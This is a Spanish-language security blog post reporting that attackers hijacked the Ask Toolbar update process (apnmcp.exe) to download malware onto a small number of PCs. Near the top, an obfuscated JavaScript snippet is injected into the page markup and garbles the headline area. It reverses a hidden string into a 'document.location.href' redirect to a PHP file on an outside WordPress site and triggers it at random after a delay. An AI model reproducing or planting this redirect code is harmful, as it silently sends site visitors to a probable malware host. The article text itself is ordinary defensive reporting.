Modifican el proceso de actualización de Ask Toolbar para infectar con malware los equipos
Modifican el proceso de actualización de Ask Toolbar para infectar con malware los equipos
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>toolbar-utilizada-para-instalar-malware.jpg?x=634&y=309″ alt=”” width=”634″ height=”309″ /><br />
utilizan ask <script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
toolbar para distribuir virus
¿Cazador cazado? Hablar de esta barra de herramientas seguro que trae “buenos” recuerdos a muchos usuarios. Ask Toolbar comenzó a distribuirse con el auge de Internet y aún continúa dando mucho de qué hablar. Considerada un adware, un grupo de expertos en seguridad ha detectado que el software se está utilizando para instalar otros malware en los equipos.
Lo más curioso de todo esto es que no son los propietarios del software los que se están beneficiando sino terceras personas. Con esto queremos decir que ciberdelincuentes han descubierto cómo sacar provecho del proceso que realiza la actualización de la barra de herramientas para así instalar otras amenazas en los equipos que tienen instalada esta.
La instalación de programas y barras de herramientas adicionales podría suponer el robo de datos
La instalación de programas y barras de herramientas adicionales podría suponer el robo de datos
apnmcp.exe es el proceso de la discordia y que ha levantado las alarmas en varias herramientas de seguridad, catalogando su actividad como sospechosa, algo que no había sucedido hasta este momento. Pero esto no es nada nuevo, ya que en muchas ocasiones los ciberdelincuentes se afanan en inyectar código en procesos legítimos del sistema para pasar desapercibido ante los softwares antivirus, algo que en esta ocasión no ha funcionado.
Expertos en seguridad han detectado que tras la ejecución de forma satisfactoria de este script, se ejecuta un archivo de imagen que posee el código necesario para llevar a cabo la descarga de dos binarios.
Está bastante claro que los ciberdelincuentes han encontrado la forma de manipular Ask Toolbar y servirse de sus recursos para infectar los equipos de los usuarios, algo que ha obligado a los propietarios de la misma a tomar medidas.
Forget that page, un complemento para navegadores web que elimina tu “huella”
La utilización ilegítima de Ask Toolbar de momento acotada
Mientras los responsables de la misma no vierten ningún tipo de información, los expertos en seguridad encargados del hallazgo han detallado que por el momento este uso está muy acotado. Por el momento solo se ha encontrado en 10 equipos, pero sí que es verdad que de la noche a la mañana todo puede cambiar, sobre todo si Internet está de por medio.
Lo que sí está confirmado es que existe una versión disponible de esta barra de herramientas para solucionar este problema. Aunque la verdad, suena a paradoja que alguien quiera mantener este software tan intrusivo en el sistema, cuando la mejor opción es llevar a cabo su desinstalación.
– Ver información original al respecto en Fuente:
toolbar-para-infectar-con-malware-los-equipos/#sthash.6qrCd6tD.dpuf
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.